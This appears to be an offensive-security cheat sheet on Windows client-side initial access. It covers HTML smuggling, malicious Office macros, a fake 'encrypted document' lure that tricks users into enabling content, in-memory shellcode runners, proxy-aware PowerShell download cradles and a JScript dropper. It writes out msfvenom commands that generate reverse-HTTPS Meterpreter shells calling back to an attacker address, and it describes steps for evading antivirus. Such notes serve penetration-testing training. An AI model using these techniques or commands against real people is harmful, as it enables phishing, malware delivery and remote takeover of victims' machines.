- This technique will download a meterpreter payload once the web page is loaded by the user. (may be blocked by smart screen or other protections)
Codes can be found here
- This techniques will run a macro (once user enable them), that will download on disk a meterpreter payload and execute it hidden from the user.
- Tested using Office 2016 Pro
- The document must be saved in a Macro-Enabled format such as ".doc" or ".docm". The newer ".docx" will not store macros.
Code can be found here
-
Make a script to download the payload in powershell. Here is how download a file in powershell.
-
Combining the piece with VBA. Make a macro that will pull the meterpreter executable from our web server when the document is opened and macro are enabled. The delay is to allow the file to completely download. Finally the file is executed hidden from the user.
- This technique is used to trick the user to press on the "Enable Editing" and "Enable Content" button to allow macro execution.
Code can be found here
- Create an "encrypted" word page content, something in the idea "This file is encrypted, please Enable Editing and Enable content to decrypt it".
- Make a copy of this word document.
- Delete the content, and create your "decrypted" content. If you'r target work in human resource, make a CV as example.
- Once the content created, select it and navigate to "Insert > Quick Parts > AutoTexts" and "Save Selection to AutoText Gallery.
- Pick a name for the AutoText gallery.
- Now that the content is stored, delete the content in the main text area and replace it with the content of our "encrypted" word document.
- Create the VBA macro to replace the "encrypted" content with the "decrypted" content.
- This macro execute shellcode in memory by using Win32 APIs to avoid detection.
- Use the exit function "thread" while generating the payload to avoid word to close when the shellcode exit.
- If the victim close Word, our shell will die.
Code can be found here
- Generate a msf payload formatted as vbapplication.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.22 LPORT=443 EXITFUNC=thread -f vbapplication
- Create the macro adding your generated array payload to it.
- This macro download a PowerShell script and run it into memory. Then it will launch the PowerShell script as child process to avoid losing our shell once the victime close Microsoft Word.
Code can be found here
- Generate the shellcode in PowerShell format using msfvenom.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.22 LPORT=443 EXITFUNC=thread -f ps1
-
Create "run.ps1" script.
-
Create the VBA macro which will download the ps1 code in memory and execute it.
- This PowerShell script avoid creating artifacts on the hard drive that may be identified by Anti Virus.
Code can be found here
- Generate the shellcode in PowerShell format using msfvenom.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.22 LPORT=443 EXITFUNC=thread -f ps1
-
Create "run.ps1" script.
-
Create the VBA macro which will download the ps1 code in memory and execute it.
Code can be found here
- Bypass proxy server when downloading file with PowerShell, by nulling the proxy settings
- Customize User-Agent
- Handle communication through a proxy, even as SYSTEM.
- HTTP request is routed through the proxy server and will allow our download cradle to call back to our C2 even when all traffic must go through the proxy.
- Use JScript file format to execute Javascript on Windows targets through the Windows Script Host.
- This dropper download a Meterpreter executable from a web server and execute it.
Code can be found here